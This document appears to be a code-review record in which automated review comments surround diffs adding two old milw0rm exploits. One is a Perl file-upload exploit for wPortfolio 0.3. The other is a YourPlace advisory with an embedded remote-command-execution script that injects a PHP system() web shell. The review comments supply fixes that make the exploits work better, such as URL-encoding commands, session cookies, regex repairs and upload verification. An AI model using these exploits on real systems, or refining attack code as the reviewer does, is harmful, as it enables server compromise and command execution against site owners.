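Review bot: exec_cmd treats a command with empty output as a failure and then ends the shell: `(.+)` in `/p0w(.+)p0w/` requires at least one character between the markers, and the else branch, unlike the eVision sibling, never calls `&exec_cmd` after `$c < 3 || die ...`, so control falls out of the top-level `&exec_cmd;` and the script exits after one silent command such as `cd /tmp`; use `(.*)` and add `&exec_cmd;` after the die line. The command is also sent with its trailing newline and without percent-encoding (`$file."-posts.php?cmd=".$cmd`), so `chomp $cmd;` and `uri_escape($cmd)` (URI::Escape, part of LWP's URI dependency) are needed before anything containing a space or `&` works. The raw-socket request advertises `Keep-Alive: 300` and `Connection: keep-alive`, so when the success marker never appears the `while` loop reads until the server's idle timeout before `die "[-] Can't add posts !"` runs; this loop wants `Connection: close`. tag() maps newlines to `*` and exec_cmd maps `*` back to newlines and `$` to spaces, so any literal `*` or `$` in real command output is corrupted — worth a comment so a reader knows the output is lossy.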
@@ -0,0 +1,74 @@
+#!/usr/bin/perl
+
+# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit
+# Script Name: wPortfolio 0.3
+# Download: http://sourceforge.net/project/downloading.php?group_id=244834&use_mirror=kent&filename=wPortfolio.zip&80791070
+# Vulnerability: Arbitrary File Upload
+# Vulnerable page: /admin/upload_form.php
+# * You can upload everything you want, why not a php shell? ^^
+# Author: Osirys
+# Contact: osirys[at]live[dot]it
+# Proud to be Italian
+# Thx: athos
+
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+my $path = "/admin/upload_form.php";
+my $d_fold = "/admin/tmp/";
+my($host,$file) = ($ARGV[0],$ARGV[1]);
+
+($host,$file) || help("-1");
+cheek($host) == 1 || help("-2");
+&banner;
+my $url = $host.$path;
+
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url,
+ Content_Type => 'form-data',
+ Content => [file_to_upload => [$file]]
+ );
+
+if ($re->is_success) {
+ print "[+] Uploaded ! \n";
+ print "[+] Link: ".$host.$d_fold.$file." \n";
+}
+else {
+ print "[-] Upload failed ! \n";
+}
+
+sub cheek() {
+ my $host = $_[0];
+ if ($host =~ /http:\/\/(.*)/) {
+ return 1;
+ }
+ else {
+ return 0;
+ }
+}
+
+sub banner {
+ print "\n".
+ " ========================================== \n".
+ " wPortfolio 0.3 Arbitrary File Upload \n".
+ " Author: Osirys \n".
+ " osirys[at]live[dot]it \n".
+ " Proud to be italian \n".
+ " ========================================== \n\n";
+}
+
+sub help() {
+ my $error = $_[0];
+ if ($error == -1) {
+ &banner;
+ print "\n[-] Cheek that you typed the hostname address and the local file to upload !\n";
+ }
+ elsif ($error == -2) {
+ &banner;
+ print "\n[-] Bad hostname address !\n";
+ }
+ print "[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n";
+ exit(0);
+}
+
+# milw0rm.com [2008-11-19]
\ No newline at end of file
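Review bot: `$re->is_success` only says the POST to upload_form.php returned a 2xx, which the form page itself would do on a rejected or failed upload, so "[+] Uploaded !" and the link are printed with no evidence the file exists; a follow-up `$ua->get($host.$d_fold.$name)->is_success` before printing the link would make the result trustworthy. The link is also built from `$file` verbatim, so a local path such as `/tmp/shell.php` yields `/admin/tmp//tmp/shell.php`; derive the name with `use File::Basename; my $name = basename($file);` and use `$name` in the link. The argument check `($host,$file) || help("-1")` is a comma expression that only tests `$file`; `($host && $file) || help("-1")` expresses the intent. The header places upload_form.php under /admin/, yet the request carries no credentials or cookie, so unauthenticated reachability is asserted by this script rather than demonstrated.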
diff --git a/yourplace 1.0.2 - Multiple Vulnerabilities Remote Code Execution.txt b/yourplace 1.0.2 - Multiple Vulnerabilities Remote Code Execution.txt new file mode 100644 index 0000000..c590b60 --- /dev/null +++ b/yourplace 1.0.2 - Multiple Vulnerabilities Remote Code Execution.txt 
@@ -0,0 +1,236 @@ +[START] + +############################################################################################################################################ +[0x01] Informations: + +Script : YourPlace 0.5 (beta 1) +Download : http://www.hotscripts.com/jump.php?listing_id=80545&jump_type=1 +Vulnerability : DB Disclosure / Arbitrary Data Saving (RCE EXPLOIT) / Arbitrary File Upload / PHPInfo Disclosure / User Change Account +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + +* This script has also other vulnerability. Here you can find just the major ones ! + I wrote a simple RCE Exploit also. + + +############################################################################################################################################ +[0x02] Bug: [Database Disclosure] +###### + +Vulnerable file is: /[path]/user/info/users.txt + +This script uses a .txt file to store usernames and passwords. + +### [!] EXPLOIT: + 1) Go at: /[path]/user/info/users.txt + 2) Get username and password ! + ex: osirys $1$H9mfzCTo$gbuasEowB1agfEqWolcGR. + username password crypted with crypt function + + +############################################################################################################################################ +[0x03] Bug: [Arbitrary Data Saving] ## RCE EXPLOIT !! +###### + +Bugged file is: /[path]/internettoolbar/edit.php + +To exploit this vulnerability, we must be logged in. + +[CODE] + + $fav5_url = $_POST['fav5_url']; + $fav1_name = $_POST['fav5_name']; + + $write = "<? 
\n $homepage = '".$homepage."';\n \n + $fav1_url = '".$fav1_url."';\n + $fav1_name = '".$fav1_name."';\n \n + $fav2_url = '".$fav2_url."';\n + $fav2_name = '".$fav2_name."';\n \n + $fav3_url = '".$fav3_url."';\n + $fav3_name = '".$fav3_name."';\n \n + $fav4_url = '".$fav4_url."';\n + $fav4_name = '".$fav4_name."';\n \n + $fav5_url = '".$fav5_url."';\n + $fav5_name = '".$fav5_name."';\n \n ?>"; + + $write = str_replace('$','$',$write); + $fp = fopen("../user/internettoolbar/index.php", "w+"); + $fw = fwrite($fp, $write); + +[/CODE] + +All the $fav variables come from POST. There is any cheek on what the user put in the form of $fav vars. +Then the script will save the value of this vars in /[path]/user/internettoolbar/index.php. +So we can put an evil php code ;) +I wrote a simple exploit, a simple proof of concept, change it in your own way ;) +This exploit can be adapted to your own needs. + +############################################################ +########################################## +## Remote Command Execution Perl Exploit + +[code] + +#!/usr/bin/perl + +use HTTP::Request; +use LWP::UserAgent; + +my $path = "/internettoolbar/edit.php"; +my $exec_path = "/user/internettoolbar/index.php"; +my $c0de = "lol.it';?><?php system(\$_GET['cmd']);'"; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +print "[+] Connecting to $host ..\n"; +print "[+] Writing hell php code ..\n"; + +my $url = $host.$path; + +my $ua = LWP::UserAgent->new; +my $post = $ua->post($url, + [ + fav1_url => $c0de, + do => submit + ]); + +if ($post->is_success) { + print "[+] Commands:\n"; + print " exit -> quit the exploit \n"; + print " your command -> exec your cmd \n"; + &exec_cmd; +} +else { + print "[-] Can't write hell code !\n"; + exit(0); +} + +sub exec_cmd { + print "shell[Osirys]$>\n"; + $cmd = <STDIN>; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host.$exec_path."?cmd=".$cmd); + $re = query($exec_url); + if ($re =~ 
/\?>(.*)/) { + print "[*] $1\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub query() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub banner { + print "\n". + " ============================ \n". + " YourPlace RCE Exploit \n". + " Coded by Osirys \n". + " osirys[at]live[dot]it \n". + " Proud to be italian \n". + " ============================ \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you typed the hostname address and the command to execute !\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +[/CODE] + + +############################################################################################################################################ +[0x04] Bug: [Arbitrary File Upload] +###### + +Bugged file is: /[path]/apps/standard/upload.php + +To upload our local file we must be logged in. Then we can upload any file. +The bug here is to allow user to upload file of any extensions, in fact there isn't any extension cheek. + + +### [!] EXPLOIT: + 1) Go at: /[path]/apps/standard/upload.php + 2) Upload your local file. + 3) Cheek it here: /[path]/user/uploads/your_file.your_ext + + +############################################################################################################################################ +[0x05] Bug: [PHPInfo Disclosure] +###### + +Vulnerable file is: /[path]/user/uploads/phpinfo.php + + +### [!] 
EXPLOIT: + 1) Go at /[path]/user/uploads/phpinfo.php + 2) Get php information + + +############################################################################################################################################ +[0x06] Bug: [User Change Account] +###### + +Bugged file is: /[path]/login/register.php + +[CODE] + +if (isset ($_POST['submit'])) { + $fp = fopen ( '../user/info/users.txt', 'w+' ); + + if ($fp){ + $data = $_POST['username']."\t".crypt($_POST['password'])."\r\n"; + fwrite ( $fp, $data ); + fclose ( $fp ); + echo ":-)"; + } + +[/CODE] + +Registering a new user, the old one will be deleted. + + +### [!] EXPLOIT: Go at: /[path]/login/register_form.php + Register your new user + + +############################################################################################################################################ + +[/END] + +# milw0rm.com [2008-12-22] \ No newline at end of file
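Review bot: The prompt in exec_cmd of the embedded Perl exploit is `print "shell[Osirys]$>\n";`, and inside a double-quoted string `$>` interpolates the effective UID, so the prompt shows a number instead of `$>` followed by a newline — the author's other scripts write it as `"shell\$> "`; change this to `print "shell[Osirys]\$> ";`. The [0x03] text states that writing through edit.php requires being logged in, but the exploit posts with a fresh LWP::UserAgent that has no cookie jar, credentials or login step, and `$post->is_success` is true for any 2xx (a login page included), so "[+] Commands:" does not prove the file was written; a session argument applied with `$ua->default_header(Cookie => "PHPSESSID=$sid")` or a real login request is missing. The output match `/\?>(.*)/` has no `/s`, so multi-line output is cut to its first line, and it presupposes a literal `?>` in the response, which presumably only appears when the server does not honour the `<?` short tag the generated index.php begins with — that precondition should be stated. help("-1") reports "the hostname address and the command to execute" while the usage line takes only the host. The script also lacks `use strict; use warnings;`, which would have flagged the bareword `submit` in `do => submit`.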